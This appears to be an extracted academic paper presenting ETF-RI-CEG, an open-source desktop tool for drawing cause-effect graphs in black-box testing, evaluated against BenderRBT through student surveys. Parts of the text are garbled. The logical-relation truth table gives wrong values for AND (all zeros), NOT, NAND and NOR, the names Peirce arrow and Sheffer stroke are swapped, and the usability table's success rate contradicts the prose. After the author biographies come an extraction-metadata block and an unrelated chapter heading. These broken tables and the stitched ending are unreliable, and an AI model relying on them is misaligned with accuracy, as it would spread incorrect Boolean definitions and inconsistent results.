1) Causes, which are used to describe different variables or events which result in the activation of effects in the system. Cause nodes are always placed on the left side of the graph. Causes are denoted as \( C_i \) (where \( i > 0 \) represents the number of the node). Every cause-effect graph must have at least one cause node.
2) Effects, which are used to describe different variables or events which are triggered by the causes of the system. Effect nodes are always placed on the right side of the graph. Effects are denoted as \( E_i \) (where \( i > 0 \) represents the number of the effect node). Every cause-effect graph must have at least one effect node.
3) Intermediates, which are used as helpers for capturing different logical relations between cause nodes. The purpose of these nodes is to reuse the effects of logical relations as causes for other logical relations. Intermediate nodes are always placed between the causes and effects of the graph. Intermediates are denoted as \( I_i \) (where \( i > 0 \) represents the number of the intermediate node). Usage of intermediates is optional.
Six different logical relations can be defined between graph causes, intermediates and effects. Due to the initially intended purpose of cause-effect graphs for testing hardware logical circuits in [1], truth tables of logical relations are very similar to those of logical gates. In addition to the four standard logical relations: DIR (direct), NOT (negation), AND (conjunction) and OR (disjunction), two additional relations (which are omitted in some works such as [4] and [19]) can be used: NAND (Peirce arrow) and NOR (Sheffer stroke). The direct and negation logical relations are unary, meaning they have exactly one cause and one effect node, whereas all other logical relations are \( n \)-ary, meaning they have \( n > 1 \) causes and one effect node. The truth table for all six logical relations is shown in Table I, where nodes (labeled as \( N_i \) and \( N_j \)) represent causes and the operation result represents the resulting effect value (value of 0 means that the effect is not activated and vice versa). Only \( N_i \) values are used for determining the results of the direct and negation relations, which are unary.
Five different dependency constraints can be defined between graph causes or effects: EXC (exclusion), INC (inclusion), REQ (required), MSK (masking) and EXC Δ INC (one and only one – exclusion inclusion). All constraints except for MSK are defined on causes, whereas the MSK constraint is
defined on effects. Intermediates cannot be used in constraints. EXC, INC and EXC Δ INC constraints are n-ary, meaning they have \( n > 1 \) causes, whereas REQ and MSK constraints are binary, meaning they are defined on exactly two nodes. The truth table for all five constraints is shown in Table II, where depending on the type of the constraint, nodes \( N_1 \) and \( N_2 \) can either represent causes or effects, whereas the operation result represents the resulting test case feasibility (value of 0 means that the test case is not feasible and vice versa).
\[
\begin{array}{|c|c|c|c|c|c|}
\hline
\text{Cause values} & \multicolumn{5}{|c|}{\text{Resulting effect values}} \\
\hline
\text{N}_1 & \text{N}_2 & \text{DIR} & \text{NOT} & \text{AND} & \text{OR} & \text{NAND} & \text{NOR} \\
\hline
0 & 0 & 0 & 0 & 0 & 0 & 0 & 1 \\
0 & 1 & 0 & 1 & 0 & 1 & 1 & 1 \\
1 & 0 & 1 & 0 & 0 & 1 & 1 & 0 \\
1 & 1 & 1 & 1 & 0 & 1 & 0 & 0 \\
\hline
\end{array}
\]
\[
\begin{array}{|c|c|c|c|c|c|c|}
\hline
\text{Node values} & \multicolumn{6}{|c|}{\text{Resulting test case feasibility}} \\
\hline
\text{N}_1 & \text{N}_2 & \text{EXC} & \text{INC} & \text{REQ} & \text{MSK} & \text{EXC} \Delta \text{INC} \\
\hline
0 & 0 & 1 & 0 & 1 & 1 & 0 \\
0 & 1 & 1 & 1 & 1 & 1 & 0 \\
1 & 0 & 1 & 1 & 0 & 1 & 1 \\
1 & 1 & 1 & 1 & 0 & 0 & 0 \\
\hline
\end{array}
\]
**B. Related Work**
Cause-effect graphs have been applied to many problems used in many areas such as telecommunication distributed systems [20], quantum programming [10], knowledge assessment [21], automatic college placement process [22] and high-speed safety-critical railway systems [9]. Due to their similarity to digital circuits [4], cause-effect graphs can be applied to a variety of problems that require logical relation modeling, in order to determine which test cases are feasible so the overall number of tests can be reduced. Cause-effect graphs have also been combined with other techniques, such as pairwise testing [23], UML model transformations [24] [25] and Boolean differentiation [26] [7].
The wide usage of cause-effect graphs as a black-box testing technique accentuates the importance of the process of correctly defining cause-effect graph specifications, which is imperative in order to correctly derive black-box test cases for the desired system. In some of the aforementioned works, constraint usage is omitted, which results in more feasible test cases than what is truly defined by system requirements. For example, in [9] the MSK constraint is not used between effect nodes. However, the effects are simultaneously exclusive and the existence of this constraint is necessary for removing infeasible test cases. In [22], the test case table contains test cases which do not conform to the presented cause-effect graph specification (e.g. when C6 is active, E2 is not set to active although these two nodes are connected by using the DIR logical relation). This indicates that cause-effect graph elements are used incorrectly or their usage is omitted in multiple available works, which results in incorrect feasible test case table specifications.
Different works use different types of graphical notation for describing cause-effect graphs, sometimes introducing elements which are hard to understand as they do not conform to any introduced standard. Due to these inconsistencies, it is important to analyze the standard accepted CEG graphical notation and its variations. In cases where multiple different proposed notations exist and are widely used, such as in case of entity relationship diagrams (ERDs), methods for conversion between different notations and detailed descriptions of differences between accepted standards are necessary [27]. However, in cause-effect graphs there is only one general standard and notations which do not conform to this standard are present only in a small number of available works. The initial graphical notation for representing cause-effect graph elements was introduced in [1]. This notation is very simple and includes the usage of different types of letters for representing logical relations and constraints (e.g. A for conjunction and O for disjunction). Full lines are used for connecting nodes by logical relations and dashed lines are used for connecting nodes by constraints.
Although the usage of full and dashed lines was adopted by all later works, many changes were made in the graphical notation for representing logical relations. Most works [2] [3] [4] [7] use graphical elements instead of letters to represent logical relations (e.g. wavy line for negation, arch and the symbol “\( \Delta \)” for disjunction) and this type of notation is considered as the general standard. However, some approaches use graphical notation which significantly differs from the standardized notation. For example, in [21] arrow tips are used for connecting nodes by logical relations, although arrow tips are standardly used only for representing the direction of the REQ and MSK constraints. In [15], logical relations are represented through the usage of bounding boxes and different symbols (e.g. AND instead of A for conjunction). A novel graphical notation with many differences to the general standard was proposed in [16]. This notation is more suited for the requirement elicitation process and introduces many new types of cause-effect graph elements such as membership and interactions. However, CEG representations created by the usage of this novel approach cannot be directly used for deriving test case tables and an algorithm for performing this conversion has yet to be introduced.
The development of software tools for aiding the process of cause-effect graph specification began with the introduction of TELDAP (Test Library Design Automation Program) in the initial work that introduced cause-effect graphs as a black-box testing technique [1]. TELDAP was an APL/360 program capable of processing cause-effect graph specifications and converting them to test case tables. TELDAP is outdated and no longer supported, so it will be omitted by this study. BenderRBT [17] is a commercial software tool for creating cause-effect graph specifications through a graphical user interface. This tool is not free for usage and does not use standard graphical notation. In fact, the graphical notation used in this tool does not conform to any of the previously mentioned works (e.g. no works use the symbol “\( \Delta \)” for describing the DIR relation, the definition of the MSK constraint does not conforms to the definition present in the standard literature, etc.).
Problems arising due to a low number of available software tools for creating CEG specifications were reported as far back as 1997 in [28]. Since then, several new CEG software tools...
have been introduced. Cause-effect graph software testing tool (CEGSTT) [18] is another tool for creating cause-effect graph specifications. It is not open-source nor available for free usage. This tool does not contain graphical elements, nor does it generate the graphical description of a cause-effect graph. Test generator for cause-effect graphs (TOUCH) [7] is a recently proposed software tool and it also does not contain graphical elements for cause-effect graph specifications. However, this tool is open-source [29] and cross-platform unlike BenderRBT and CEGSTT, which only run on the Microsoft Windows operating system. TOUCH supports test case table derivation by using many proposed algorithms based on Boolean expressions, whereas BenderRBT and CEGSTT use only the common Myers’ backward-propagation algorithm for this purpose. Korean requirement analyzer for cause-effect graphs (KRA-CE) [30] is another recently proposed software tool which automatically converts system requirement descriptions to cause-effect graph specifications and test case tables. However, this approach is localized to the Korean language and does not contain graphical elements of cause-effect graph specifications. The tool is cross-platform but it is currently not open-source.
### III. THE PROPOSED GRAPHICAL SOFTWARE TOOL
The proposed graphical software tool is named ETF-RI-CEG. The tool is a desktop application developed by using the .NET 5 framework and the C# programming language in the Windows Forms application template type. .NET 5 version of the framework is cross-platform and supported on Microsoft Windows, Mac OS and Linux operating systems. However, in order to be able to run the tool on Mac OS or Linux, Wine needs to be installed as the Windows Forms template execution is not yet supported. Only the installation of .NET 5 Runtime is required to be able to run the tool on Microsoft Windows. The software tool is open-source and available for free usage. It can be accessed online on GitHub. The user manual of the tool contains specifications on how to build and use the application.
When the proposed tool is first opened, it contains an empty panel and options to add graph nodes, logical relations and constraints. Multiple operations can be performed with graph nodes in the proposed tool. New nodes can be added to the graph, existing nodes can be moved on the graph or deleted from the graph entirely. Adding and moving nodes is done by using the drag-and-drop operation on the panel, whereas node removal is performed by using the list of existing nodes and the Delete button. New nodes are always assigned the lowest unclaimed number for its type (e.g. if nodes C1 and C2 are defined in the graph, the new node will be denoted as C3). After deleting a node from the graph, all logical relations and constraints that contain this node are also deleted.
Multiple operations can be performed with logical relations and constraints of the graph. New relations and constraints can be added to the graph or deleted from the graph entirely. All operations on logical relations and constraints are done in the same way. The graphical representation of logical relations and constraints after they are added to the graph in the graphical tool is shown in Fig. 1 (all types of logical relations) and Fig. 2 (all types of constraints). This representation uses the standardized graphical notation from [4] and [7].
Adding and removing logical relations and constraints is done in the same way for all different types in the graphical software tool. Adding a new logical relation or constraint is more complex than adding nodes, because all nodes which are part of the desired logical relation or constraint need to be selected. To make the selection process easier for the user, every selected node is marked with a black box. Removing existing logical relations and constraints in the proposed tool
---
1 ETF-RI-CEG can be accessed by using the following link: https://github.com/ehlymana/ETF-RI-CEG-Graphical
works in the same way as removing an existing node, by selecting the desired logical relation or constraint from the corresponding list and clicking on the Delete button.
After defining the desired cause-effect graph, it can be saved for later usage by using the Import/Export option. The exported .txt file contains the structure of the graph (graph nodes, their locations, logical relations and constraints) created in the graphical software tool, as shown in Fig. 3. The contents of the file are easily readable and can be used for importing the graph for later usage in the proposed tool. When importing an existing graph file, the user is prompted to choose the desired exported file that contains the graph definition, after which the graph is shown on the panel of the tool, where it can be modified.
IV. EVALUATION
Evaluation of the proposed graphical tool was done by using three different approaches. First, multiple cause-effect graphs of different sizes from the standard literature were used for checking whether ETF-RI-CEG is scalable to graph size during the CEG specification process. The newly proposed tool was also compared to the only other currently available software tool which contains graphical elements, BenderRBT. Example graphs and a user survey were used for this purpose. User-based evaluation was also used for determining the overall usability of ETF-RI-CEG and multiple usability metrics were calculated based on the gathered information from multiple users.
A. Evaluation of Software Tool Scalability
In order to validate that the newly introduced graphical software tool can be applied for successfully creating CEG definitions, the following examples from the relevant literature were used:
1) A small cause-effect graph \( n = 6 \) cause and effect nodes) from [4] which is shown in Fig. 4. This representation uses the standard accepted graphical notation and contains causes, effects, intermediates and different types of logical relations, as well as a single constraint. Fig. 5 shows the definition of the same cause-effect graph in the proposed tool. It is visible that the two graphs are nearly identical due to the fact that the same notation is used for representing the graph. The only difference can be seen in the naming convention for nodes – the original representation uses numbers associated with the system requirements, whereas the proposed tool explicitly defines the type and number for every node shown on the graph.
Fig. 4. Example cause-effect graph from [4] which contains three cause nodes, three effect nodes, one intermediate node, four logical relations and one constraint.
Fig. 5. The output of the proposed graphical software tool for the cause-effect graph defined in Fig. 4.
2) A medium cause-effect graph (n = 10 cause and effect nodes) from the original work that introduced the cause-effect graphing technique [1] which is shown in Fig. 6. This graph uses graphical notation proposed in the original work (A represents the AND relation, O represents the OR relation, etc.). Fig. 7 shows the definition of the same cause-effect graph in the proposed graphical software tool, where the standardized graphical notation is used to represent logical relations and one intermediate node is visible on the graph. There are many differences to the original representation including separate numbering for different types of nodes and the usage of improved graphical notation for representing logical relations. The most important difference to the original representation is the replacement of the EXC constraint originally defined on nodes $C_1$ and $I_1$. Using intermediates in constraints is not directly allowed in the proposed tool (because constraints can only be defined on cause nodes). This relation was replaced by putting an EXC constraint on both of the cause nodes that result in the activation of the intermediate node $I_1$ to capture the desired relation.
3) A large cause-effect graph (n = 25 cause and effect nodes) from [4] which is commonly used for comparison due to its large size, which is shown in Fig. 8. Fig. 9 shows the definition of the same cause-effect graph in the proposed tool. Some of the differences to the original representation have already been mentioned in previous examples, including changes regarding node numbering. New intermediate nodes were added to the graph in order to capture the NOT logical relation prior to the usage of the desired nodes in binary logical relations, because unary and binary logical relations cannot be combined. The main difference to the original representation is the replacement of the negated REQ constraint originally defined on nodes $C_1$ and $C_2$. The usage of this constraint is not directly allowed in the proposed tool (because constraint values cannot be negated). This relation was replaced by using the EXC Δ INC constraint (which renders two out of four combinations $C_1$-$C_2$: 0-0 and 1-1 infeasible) combined with the REQ constraint (which renders the third combination $C_1$-$C_2$: 0-1 infeasible, leaving only the desired combination $C_1$-$C_2$: 1-0 feasible).
and the proposed tool. In BenderRBT, nodes are not numbered but instead contain descriptions related to system requirements. Standardized graphical notation is not used to represent logical relations or constraints.
Some differences which needed to be made have already been mentioned, such as combining the usage of unary and binary relations. The main difference to the original representation is the replacement of the MSK constraint originally defined on causes (which is forbidden, because the MSK constraint can be applied only to effects). It was additionally unclear what the meaning of the negated MSK constraint present in Fig. 10 was. As explained by [31], negation on the MSK relation is used in BenderRBT to represent the subject of the MSK relation, whereas the other links are used to represent the objects of the MSK relation. This does not conform to the standard definition of the MSK relation explained in Section II. Instead, it represents the REQ relation between the subject and the objects of the MSK relation. Therefore, the identified REQ relations were added to the graph as a replacement for the incorrectly applied MSK relation.
The presented example and the achieved results by comparing the output of BenderRBT with the output of ETF-RI-CEG could not be generalized, because this example might not be representative of all BenderRBT outputs. In order to improve the objectivity of the results, a user survey was conducted. The survey contained multiple examples which can
---
2 The user survey can be accessed by using the following link: https://forms.gle/ypcHEP5YHkWC28FD6
be found in the BenderRBT user manual [31] and their representations created in ETF-RI-CEG. The survey focused on comparing the different representations and getting information from the users on which representation is easier to understand, how complex they perceive the cause-effect graphs, whether they can correctly identify results of logical relations and constraints, etc. The survey was completed by 59 BSc and MSc students of Faculty of Electrical Engineering, University of Sarajevo. Their background knowledge of software testing and cause-effect graphs is summarized in Table IV. Most participants had little to no experience with software testing and more than a third of participants had not heard of cause-effect graphs before.
Participants were shown three different cause-effect graph specifications of varying complexities from BenderRBT and their equivalent representations from ETF-RI-CEG. They were also asked to choose the tool with a more intuitive UI. The achieved results are shown in Fig. 12. The results show that in all cases, a larger number of users chose cause-effect graphs generated by the proposed tool as their preferred choice. It is also visible that more users found the user interface of the proposed tool more intuitive than the user interface of BenderRBT.
The users’ knowledge of constraints and ability to correctly identify cause-effect graph elements was also targeted by the survey. They were asked which types of nodes the REQ and MSK constraints can be applied to, after which they were shown two CEG specifications – one containing the MSK constraint created by BenderRBT, and one containing the REQ constraint created by ETF-RI-CEG. The results are shown in Table V. A very low number of users correctly understood the REQ and MSK relations (28.8% and 27.1% respectfully), whereas an even lower number of users correctly identified test cases conforming to CEG specifications from BenderRBT and ETF-RI-CEG (20.3% and 16.9% respectfully). Additionally, only 20.3% of users were able to correctly identify that the two CEG representations generated by BenderRBT and ETF-RI-CEG from Fig. 10 and Fig. 11 were equivalent.
The users were also shown a cause-effect graph of high complexity and its representations in BenderRBT and ETF-RI-CEG. They were asked to identify the number of all types of nodes contained in the graph and to rate the complexity of the graph representations from 1 to 10. The cause-effect graph representations generated by BenderRBT and ETF-RI-CEG achieved an average complexity rating of 7.41 and 5.62 respectfully. The exact number of nodes (causes, intermediates and effects) from representations generated by BenderRBT and ETF-RI-CEG were correctly identified by 25% and 59.38% of users respectfully. 57.6% of users answered that CEG nodes with textual descriptions made it easier to understand system requirements, whereas 49.2% of users answered that CEG nodes without textual descriptions made it harder to understand system requirements.
Other available tools (CEGSTT, TOUCH and KRA-CE) do not contain graphical elements of cause-effect graphs, as their primary purpose is the application of algorithms which are meant to convert cause-effect graph specifications to test case tables. Nodes and relations in these tools are instead defined by using the provided user interface or textual files. For this reason, the newly proposed tool could not be compared to these tools, as there is no graphical output for comparison.
### Evaluation of Usability
User-based evaluation of the newly proposed tool was conducted by creating a remote usability survey\(^3\) [32]. The survey contained directions on how to install ETF-RI-CEG and 12 tasks which the users needed to complete by using all functionalities of the proposed tool. The questions contained in the survey were based on the following user experience factors [33]: ease of use, efficiency, helpfulness, intuitive operation, learnability and simplicity. The survey was completed by 45 BSc and MSc students of Faculty of Electrical Engineering.
\(^3\) The user survey can be accessed by using the following link: https://forms.gle/wbjFbfdf4LVkVrie7
University of Sarajevo. The achieved usability metric values as defined in [32] are summarized in Table VI. The participants were able to successfully complete 10.91 tasks out of 12 on average with an overall average success rate of 90.92%, overall average task accuracy of 74.81%, overall average efficiency of 0.285, overall average error rate of 3.96 and overall average critical statement ratio of 11.14.
<table>
<thead>
<tr>
<th>Metric</th>
<th>ETF-RI-CEG functionalities</th>
</tr>
</thead>
<tbody>
<tr>
<td>Success rate</td>
<td></td>
</tr>
<tr>
<td>0-33% tasks</td>
<td>2.2%</td>
</tr>
<tr>
<td>33%-66% tasks</td>
<td>11.1%</td>
</tr>
<tr>
<td>66%+ tasks</td>
<td>86.7%</td>
</tr>
<tr>
<td>Average success rate</td>
<td>87.83%</td>
</tr>
<tr>
<td>Task accuracy</td>
<td></td>
</tr>
<tr>
<td>57.8%</td>
<td></td>
</tr>
<tr>
<td>Error rate</td>
<td>1.37</td>
</tr>
<tr>
<td>Efficiency</td>
<td>0.142</td>
</tr>
<tr>
<td>Average task duration</td>
<td>4.07 minutes</td>
</tr>
<tr>
<td>Critical statement ratio</td>
<td>6.5</td>
</tr>
</tbody>
</table>
Different types of mistakes which the users of ETF-RI-CEG reported are shown in Fig. 13. 43.8% of users did not report making any mistakes, whereas 50% of users who reported mistakes listed working with logical relations as the most difficult. Mistakes while using some functionalities such as element removal or the export/import feature were not reported by any users of the tool.
Users were asked to grade the proposed tool based on three user experience factors: ease of usage, intuitivity and helpfulness. The achieved results are shown in Fig. 14, where it can be seen that the proposed tool achieved results higher than 90% for all three factors of usability. Users were also asked to choose which functionalities they found easy and hard to use. The easiest functionalities identified by users were moving nodes (86.7%), adding nodes (84.4%) and the import feature (84.4%), whereas the hardest functionalities identified by users were adding complex logical relations (44.4%) and adding constraints (71.1%).
D. Result Analysis
The achieved results when comparing the usage of notation in the standardized literature to results achieved by using the proposed tool from Section IV.A indicate that standardized graphical notation and outputs of different logical relations and constraints are often violated by adding elements which are not defined in the available literature. This results in confusing CEG definitions with unclear relation outputs. Examples of these violations can be seen in Fig. 6, where a constraint is used on an intermediate node (although constraints cannot be defined on intermediate nodes), in Fig. 8, where unary relations (NOT) are combined with binary relations (AND) without the usage of intermediate nodes, where negated REQ relation is used (although the REQ relation cannot be negated), as well as in Fig. 10, where the negated MSK relation is used (although MSK relation cannot be negated) and where the MSK relation is used on cause nodes (instead of on effect nodes) in a completely misleading and confusing way, since the relation that wanted to be captured between the causes was actually the REQ relation.
The newly proposed tool solves the aforementioned problems by not allowing the user to manually specify anything that is not supported by the standardized literature. This makes it impossible to use an intermediate node in constraints or negate constraints whilst creating a cause-effect graph specification. These violations are not necessary and can be remodeled by using supported relation types, as demonstrated in all example graphs used for evaluation of the proposed tool. The user survey showed that most users do not understand the meaning and usage of the REQ and MSK constraints, which makes the necessity of the usage of standardized notation with explicitly defined truth tables even higher. This results in standardized and easily understandable cause-effect graphs that conform to standardized graphical notation and do not contain elements that are difficult to understand due to their inconsistencies with truth tables for logical relations and constraints.
Results of the user survey of ETF-RI-CEG when compared to the only other available software tool with the usage of graphical elements, BenderRBT, indicate that CEG...
specifications generated by the proposed tool are easier to understand. The textual descriptions present in BenderRBT representations did not make it significantly easier to understand system requirements, and equivalent representations from BenderRBT were rated as more complex than representations from ETF-RI-CEG. Usability metrics of the proposed tool indicate that most users were able to use the tool successfully and that difficulties in this process occurred when adding complex logical relations and constraints. It is important to note, however, that most users had little to no experience with cause-effect graphs and software testing in general. They were not taught how to use the tool or offered an user manual and they were still able to achieve an average success rate of 90.92%. Over 90% of users rated ETF-RI-CEG as easy to use, intuitive and helpful which indicates that the proposed tool will achieve similar results in the future, especially due to the fact that it will be open-source and free for usage.
V. Threats to Validity and Limitations
The evaluation of the newly proposed graphical software tool was conducted by using a large number of available cause-effect graph examples from the standard literature. A total of 16 graphs were created successfully with an average size of N = 9.4 nodes. The import/export feature of the tool enables other users to achieve the same results and access the successfully created cause-effect graph specifications. Additionally, ETF-RI-CEG is open-source and the exported generated cause-effect graph specifications are available for free usage. Therefore, the internal validity of this study has been achieved successfully because the experiment can be repeated and same results can be achieved without any external variables influencing the outcome.
The surveys conducted for evaluating the usability of the newly proposed tool and for comparing this tool with BenderRBT features expose threats to the external validity of the study. Both surveys were conducted in the form of a remote usability survey, which might result to results which are significantly biased. The participants of the surveys were mainly BSc and MSc students of Computer Science and Informatics, who had little to no experience in software testing. The overall number of participants was 45 and 59, which might not be a large enough sample for determining accurate results. Around 60% of participants were familiar with cause-effect graphs, although biased selection of subjects for taking the survey was avoided in a similar way as described in [12]. No training was provided to users before taking the survey, which might have affected the achieved results and increased the overall time required for completing tasks in the proposed graphical software tool.
The structure of participants poses another threat to external validity of the study. No domain or industrial experts were included in the study due to their unavailability, which might pose a problem in cases where open-source and industrial development have many differences, as reported in [34]. If BenderRBT was commonly used among domain experts in the software development industry, the usability of this tool would far outperform the usability of the newly proposed tool as the users would be more familiar with its interface. These claims cannot be proven or discarded due to the unavailability of this type of data. However, both surveys were conducted by using multiple consolidated factors from [33] for generating more objective results. A similar problem with the structure of participants and limited generalizability of the achieved results was reported in [35], however the structure of study subjects had a low impact on the achieved results due to the nature of the study itself and its human-centered concepts. A similar conclusion can also be derived for this study, because although the subjects of the study had some prior experience in software testing, they had not used neither ETF-RI-CEG nor BenderRBT before. This may lead to more objective results than if the tools were evaluated by domain experts who have had prior experience with BenderRBT, as the familiarity with any of the evaluated tools can affect the objectivity of the results and lead to different usability metric values.
The main limitation of this study is the unavailability of existing CEG software tools. Only one tool (TOUCH) is open-source and can be freely accessed, whereas no other existing tool could be successfully acquired by the authors of this paper. Due to this drawback, the properties of other existing tools could not be evaluated or validated (e.g. being cross-platform, the file format supported by the import/export feature), which is why the information from user manuals provided by the authors of the tools was used as the only relevant source. If BenderRBT had been available, a third survey requiring users to perform the entirely same tasks as in the study focusing on ETF-RI-CEG could have been conducted. These results could have then been compared and a more objective comparison between the usability of these two tools could have been made.
VI. Conclusion
Cause-effect graphing is a popular black-box testing technique widely used for creating test case tables necessary for executing black-box tests on the desired system. Problems with creating test cases for a given system often arise due to the insufficient amount of knowledge of cause-effect graph elements. This leads to the improper usage of logical relations and constraints while creating cause-effect graph specifications from system requirements. The standardized graphical notation is also often violated, resulting in specifications which are difficult to understand as they do not conform to truth table definitions and introduce elements without a sufficient amount of explanation or methods for their conversion to the standardized notation. A small number of software tools has been proposed for aiding the process of creating CEG specifications, however the available tools are mainly focused on the application of algorithms for deriving test cases instead of defining graphical cause-effect graph elements and most tools are not available for free usage. The only available graphical tool is commercial and does not use standardized graphical notation.
In this paper, a new graphical software tool for creating cause-effect graph definitions was presented. The tool aims to overcome the existing difficulties of creating cause-effect graph specifications which arise due to a poor understanding of logical relations and constraints. It also aims to provide a new and intuitive user interface that can help users create cause-effect graph definitions in a fast and efficient way while using
standardized graphical notation without allowing the usage of any non-standardized elements in cause-effect graphs.
Several approaches have been used to evaluate the newly proposed software tool. The comparison between the graphical representation of the graphs created by using the proposed graphical software tool and the originally proposed representations shows that the new tool is scalable and can be used to successfully create specifications of cause-effect graphs of different sizes. The only differences in the graphical representations were a result of the improper usage of standardized graphical notation in the original works.
The results obtained by using the proposed tool when compared to the only other available graphical software tool show that the usage of standardized graphical notation creates specifications that are easier to understand than results obtained by using non-standardized graphical notation. This was verified by conducting a user survey, which showed that usage of textual descriptions of system requirements did not significantly improve the readability of cause-effect graph specifications. Users rated CEG specifications generated by using the proposed tool as less complex than the equivalent specifications generated by using the other available graphical tool. Another user survey which was conducted to evaluate the usability of the proposed software tool showed that most users found the proposed tool as helpful, easy and intuitive to use. High values of usability metrics indicate that the newly proposed software tool offers an intuitive and easily understandable output for users who can use truth tables as help when choosing the desired logical relations and constraints for cause-effect graph specifications. In this way, standardized graphical notation and explicit definitions can be used rather than non-standardized approaches.
The proposed graphical software tool was developed in the form of a desktop application. However, most tools are nowadays cloud-based and allow online collaboration between multiple users and an easily accessible user interface. Creating a web-based version of the proposed tool would remove the necessity of installation of prerequisites and the application itself, making the software tool available to more users and on multiple devices. Due to this, a web-application version of the software tool should be created by using the latest technologies, in order to make the tool fully cross-platform and widely used.
The output of the graphical software tool is the visual representation of the defined cause-effect graph, as well as an exported .txt file. This exported representation can potentially be used for reusing the graph definition in order to create black-box test case tables. This needs to be further explored for upgrading the graphical software tool with a new feature – automatically converting the graph definition into the desired test case table. The usability of the proposed graphical software tool would in this way be further improved and made comparable with other available tools, which already contain implementations of algorithms for test case table generating process from cause-effect graph specifications.
REFERENCES
Ehliman Krupalija received her B.Sc. and M.Sc. degrees in 2018 and 2020 at the Department of Computer Science and Informatics at the Faculty of Electrical Engineering of the University of Sarajevo. She is currently a teaching assistant and Ph.D. candidate at the Department of Computer Science and Informatics of the Faculty of Electrical Engineering, University of Sarajevo, Bosnia and Herzegovina. Her research interests include software quality, real-time systems, parallelization and optimization techniques.
Šeila Bečirović received her B.Sc. and M.Sc. degrees in 2017 and 2019 at the Department of Computer Science and Informatics at the Faculty of Electrical Engineering of the University of Sarajevo. She is currently a teaching assistant and Ph.D. candidate at the Department of Computer Science and Informatics of the Faculty of Electrical Engineering, University of Sarajevo, Bosnia and Herzegovina. Her research interests include computer networks and security, mobile application development and operational research.
Irfan Prazina received his B.Sc. and M.Sc. degrees in 2013 and 2015 at the Department of Computer Science and Informatics at the Faculty of Electrical Engineering of the University of Sarajevo. He is currently a senior teaching assistant and Ph.D. candidate at the Department of Computer Science and Informatics of the Faculty of Electrical Engineering, University of Sarajevo, Bosnia and Herzegovina. His research interests include web technologies, software testing and mobile application development.
Emir Cogo received his B.Sc. and M.Sc. degrees in 2011 and 2013 at the Department of Computer Science and Informatics at the Faculty of Electrical Engineering of the University of Sarajevo. He is currently a senior teaching assistant and Ph.D. candidate at the Department of Computer Science and Informatics of the Faculty of Electrical Engineering, University of Sarajevo, Bosnia and Herzegovina. His research interests include game development, computer graphics and procedural modeling.
Ingmar Bešić graduated with distinction in 2000 at the Department of Computer Science and Informatics of the Faculty of Electrical Engineering of the University of Sarajevo. He received his M.Sc. degree in Software Engineering in 2004 from the Koble College at the University of Oxford. In 2016 he received his Ph.D. degree at the Faculty of Electrical Engineering of the University of Sarajevo. His research interests include computer vision, real-time systems, software engineering, artificial intelligence, bioinformatics, computer assisted design and manufacturing and 3D scanning. He is currently an associate professor at the Department of Computer Science and Informatics of the Faculty of Electrical Engineering, University of Sarajevo, Bosnia and Herzegovina.
|
{"Source-Url": "https://hrcak.srce.hr/file/421571", "len_cl100k_base": 10109, "olmocr-version": "0.1.53", "pdf-total-pages": 12, "total-fallback-pages": 0, "total-input-tokens": 37441, "total-output-tokens": 12244, "length": "2e13", "weborganizer": {"__label__adult": 0.00029277801513671875, "__label__art_design": 0.000514984130859375, "__label__crime_law": 0.00028014183044433594, "__label__education_jobs": 0.0024890899658203125, "__label__entertainment": 9.131431579589844e-05, "__label__fashion_beauty": 0.00015795230865478516, "__label__finance_business": 0.00017380714416503906, "__label__food_dining": 0.00026226043701171875, "__label__games": 0.0008401870727539062, "__label__hardware": 0.0011701583862304688, "__label__health": 0.00030517578125, "__label__history": 0.0002689361572265625, "__label__home_hobbies": 8.571147918701172e-05, "__label__industrial": 0.0002980232238769531, "__label__literature": 0.0003559589385986328, "__label__politics": 0.00014698505401611328, "__label__religion": 0.0003838539123535156, "__label__science_tech": 0.036346435546875, "__label__social_life": 0.00010222196578979492, "__label__software": 0.02825927734375, "__label__software_dev": 0.9267578125, "__label__sports_fitness": 0.00018656253814697263, "__label__transportation": 0.0002918243408203125, "__label__travel": 0.00014865398406982422}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 54771, 0.03633]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 54771, 0.38422]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 54771, 0.93669]], "google_gemma-3-12b-it_contains_pii": [[0, 5408, false], [5408, 11568, null], [11568, 18363, null], [18363, 22395, null], [22395, 24875, null], [24875, 27524, null], [27524, 29133, null], [29133, 33318, null], [33318, 37718, null], [37718, 44512, null], [44512, 51974, null], [51974, 54771, null]], "google_gemma-3-12b-it_is_public_document": [[0, 5408, true], [5408, 11568, null], [11568, 18363, null], [18363, 22395, null], [22395, 24875, null], [24875, 27524, null], [27524, 29133, null], [29133, 33318, null], [33318, 37718, null], [37718, 44512, null], [44512, 51974, null], [51974, 54771, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 54771, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 54771, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 54771, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 54771, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 54771, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 54771, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 54771, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 54771, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 54771, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 54771, null]], "pdf_page_numbers": [[0, 5408, 1], [5408, 11568, 2], [11568, 18363, 3], [18363, 22395, 4], [22395, 24875, 5], [24875, 27524, 6], [27524, 29133, 7], [29133, 33318, 8], [33318, 37718, 9], [37718, 44512, 10], [44512, 51974, 11], [51974, 54771, 12]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 54771, 0.08609]]}
|
olmocr_science_pdfs
|
2024-12-10
|
2024-12-10
|
4a64103776a6d64281958b6b5c6aba587c32c12e
|
Chapter 3
A Schema of Function Iterations
3.1 Introduction
3.1.1 Motivations
